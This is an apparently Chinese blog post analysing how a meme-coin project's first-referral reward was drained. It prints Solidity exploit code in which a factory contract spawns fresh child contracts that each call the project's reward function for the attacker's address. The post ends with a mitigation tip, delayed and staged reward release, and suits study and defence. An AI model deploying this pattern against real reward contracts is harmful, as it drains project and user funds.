背景:
今天的分析的是链上一个土狗项目由于规则设计漏洞、致使资金全部损失的案例、近期这个项目也是圈内很火、今天看到了,就趁周末有时间从技术的角度,分析黑客如何利用链上部署的合约,进而干废项目方。
今天说的这个,不是技术漏洞bug、是规则设计漏洞。
说到这里可能有同学就说了、我合约不开源、他怎么发现我的漏洞的、怎么攻击我的、这里可以直接告诉你、不开源不代表安全、只是增加了黑客的一点点成本而已。
攻击源代码
// SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.0; contract ChildContract { // 定义合约 address constant remoteContractAddress = 0x543a975946xxxxxxxxxxxxxxxxxxxxx; // 子合约的代码... function fun(address orderAdress) public { // 调用远程合约的*****function方法 bytes4 sig = bytes4(keccak256("*****function(address)")); (bool success, ) = remoteContractAddress.call{value: 0}(abi.encodeWithSelector(sig, orderAdress)); require(success, "Remote contract call failed"); } } // 工厂合约定义 contract FactoryContract { address[] public childrenContracts; // 存储所有子合约地址的数组 function createChild(address orderAdress) public { for (uint256 i = 0; i < 10; i++) { ChildContract child = new ChildContract(); // 创建新的子合约实例 address childAddr = address(child); // 获取子合约的地址 childrenContracts.push(orderAdress); // 将子合约地址存入数组 child.fun(orderAdress); } } }
案例分析
导火索: 项目方里面有个活动、利用首次推荐新用户推荐人下单获得固定奖励、本来一切都是好好的、但是这里就有一个漏洞了。大家都知道链上都是用address 钱包定义用户的、但是合约本质上也是一个特殊的address 、故此当有人核量成本、发现一笔攻击gas能覆盖奖励收益的时候、就开始使用技术手段去攻击了。
接下来我解释一下我演示的demo流程
1、创建一个工厂合约、每次通过fro方式重复new ChildContract 这个每次new 都会得到一个新的合约地址
2、通过ChildContract 内fun 方法,固定去调用项目方函数。
3、项目方接收到调用后,规则验证通过、给推荐地址orderAdress 返一笔。
4、如果FactoryContract .createChild 一直重复调用、项目方很快破产…
5、以下是我写的一个简单的调用demo 的链上记录
打码的不用关注、主要就是告诉你、可行。。。
后期建议优化
- 业务规则上
奖励延迟分批释放、比如今天得到奖励、但是后面每天获取多少比例